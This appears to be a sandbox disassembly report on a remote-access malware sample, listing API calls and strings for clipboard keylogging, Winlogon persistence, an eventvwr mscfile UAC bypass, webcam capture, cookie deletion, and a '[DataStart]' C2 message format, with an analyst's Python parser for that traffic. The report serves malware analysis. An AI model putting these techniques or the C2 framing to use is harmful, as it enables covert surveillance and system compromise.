                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404F0E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404F18
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404F2A
                              • tolower.MSVCRT ref: 00404F47
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00404FCC
                              Strings
                              • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 00404F08
                              • [End of clipboard text], xrefs: 00404EF9
                              • [Ctrl + , xrefs: 00404EA3
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                              • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                              • API String ID: 1567161615-221715050
                              • Opcode ID: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                              • Instruction ID: 0a172b601888657c7187d64dec92691b116b1295abc4ce990af629de97d6fe53
                              • Opcode Fuzzy Hash: ebe4a0bf43562a0afdd6dc53c6e2911bed2e0ef583fe473b2b6e8d7be5cd96cd
                              • Instruction Fuzzy Hash: 5641E7B1904209BFDB14E7E4DD499EE7B78EB40300F10447BF502A2191DA789F498759
                              APIs
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                              • send.WS2_32(?,00000000), ref: 00402584
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                              • send.WS2_32(?,00000000), ref: 004025C8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@?length@?$basic_string@$?data@?$basic_string@send$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V01@@V10@0@V?$basic_string@
                              • String ID: [DataStart]0000
                              • API String ID: 4073614965-1609390111
                              • Opcode ID: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                              • Instruction ID: da84d689751dc417b3d6efdffba69dc45be3ba0d0bf169ed1abd597d19f590f1
                              • Opcode Fuzzy Hash: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                              • Instruction Fuzzy Hash: 7D21EC72500009AFCB04EFA0DD5D9EE7B78EB58345B0041B5F906E61A0DFB49E89CBA9
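Analyst note (added example, not code from the sample or from the report): the routine above builds the literal "[DataStart]0000", overwrites the placeholder at index 0x0B (the first byte after the 11-character magic), and issues two send() calls, one for that header and one for the payload whose length it just queried. The Python below frames and de-frames a TCP stream on that layout so captured C2 traffic can be cut into messages. The encoding of the 4-byte length as little-endian is an assumption; the trace shows only that the placeholder is overwritten and that the payload length is computed immediately before sending.

```python
import struct
from typing import Iterator, Tuple

MAGIC = b"[DataStart]"            # 11 bytes, the literal seen in the trace
HEADER_LEN = len(MAGIC) + 4       # magic plus the 4-byte placeholder overwritten with the length


def frame(payload: bytes) -> bytes:
    """Build one message as the traced routine does: magic, length, then payload.
    Little-endian length is an assumption."""
    return MAGIC + struct.pack("<I", len(payload)) + payload


def deframe(stream: bytes, max_len: int = 16 * 1024 * 1024) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, payload) for every complete frame in a captured stream.
    Resynchronises on the magic, so leading junk, gaps between frames, a truncated
    final frame or a bogus length field do not derail the rest of the parse."""
    pos = 0
    while True:
        idx = stream.find(MAGIC, pos)
        if idx < 0:
            return
        if idx + HEADER_LEN > len(stream):
            return  # header cut off at end of capture
        (length,) = struct.unpack_from("<I", stream, idx + len(MAGIC))
        start = idx + HEADER_LEN
        if length > max_len or start + length > len(stream):
            pos = idx + 1  # implausible or truncated: skip this magic, keep scanning
            continue
        yield idx, stream[start:start + length]
        pos = start + length


if __name__ == "__main__":
    # Constructed sample stream: junk, two frames, then a header with a bogus length
    stream = b"junk" + frame(b"first") + b"\x00" + frame(b"second") + MAGIC + b"\xff\xff\xff\x7f"
    for offset, payload in deframe(stream):
        print(offset, payload)
```

Run `deframe` over the reassembled payload of each direction of a suspect TCP conversation; frames that parse cleanly are the unit to feed into further decoding, and a stream that contains the magic but never yields a frame under this length encoding is the signal to revisit the little-endian assumption.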
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040613D
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040614C
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040616C
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,fundlldata), ref: 00406181
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00406199
                                • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 0040530E
                                • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,00415988,00000000,FunFunc), ref: 004061E0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,?,00415988,00000000,FunFunc), ref: 004061EA
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 004061FD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 00406206
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,funfunc), ref: 00406217
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040622B
                              • atoi.MSVCRT ref: 00406232
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406244
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406255
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$?length@?$basic_string@$?c_str@?$basic_string@D@2@@0@V?$basic_string@$G@2@@std@@G@std@@$??8std@@D@1@@FileHstd@@V12@$??4?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateHandleMappingV01@V10@0@V10@@Viewatoi
                              • String ID: FunFunc$fundlldata$funfunc$funready
                              • API String ID: 298526877-738133096
                              • Opcode ID: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                              • Instruction ID: a804b9d79a05e482a7dd7459e5937299dff8fe1282dbbe2cbe30763dd8b13e0d
                              • Opcode Fuzzy Hash: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                              • Instruction Fuzzy Hash: BA313071900219ABCF04ABE1EC4E9EE7738FF45315B00447AF902B21D1DEB899948B59
                              APIs
                              • _EH_prolog.MSVCRT ref: 00401F3F
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401F79
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415268,?,00415268,004151F0), ref: 00401FA0
                                • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,camframe,00415268,00000000), ref: 00401FBD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401FCA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401FD7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401FE4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401FF4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401FFE
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402014
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040201D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402026
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040202F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402038
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402041
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040204A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@V10@@_itoa
                              • String ID: camframe
                              • API String ID: 870949895-3510102068
                              • Opcode ID: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                              • Instruction ID: abce0e248e8dab4f9b6b1d1c922dc1d07b2fbcfaebd547229da4bc85d70ff786
                              • Opcode Fuzzy Hash: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                              • Instruction Fuzzy Hash: FA313C72D0001DABCB04EBA0ED4A9EEBB78FB55315F14407AF506B2091EB795A58CB68
                              APIs
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041580C,?), ref: 00402AF7
                                • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                • Part of subcall function 00408FDA: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                              • exit.MSVCRT ref: 00402B3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 00405DD0
                              • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 00405DD7
                              • PathFileExistsA.SHLWAPI(?), ref: 00405DE4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                                • Part of subcall function 0040F234: FindFirstFileA.KERNEL32(?,?,00415918,00410668,76F93520), ref: 0040F2F5
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000), ref: 00405E38
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E54
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              APIs
                              • getenv.MSVCRT ref: 00405701
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040570C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405717
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405722
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040572B
                              • DeleteFileA.KERNEL32(00000000), ref: 00405732
                              • GetLastError.KERNEL32 ref: 0040573C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],?,?,?,?,00000000), ref: 0040575D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00405770
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],?,?,?,?,00000000), ref: 00405796
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004057AB
                              Strings
                              • [Chrome Cookies not found], xrefs: 00405758
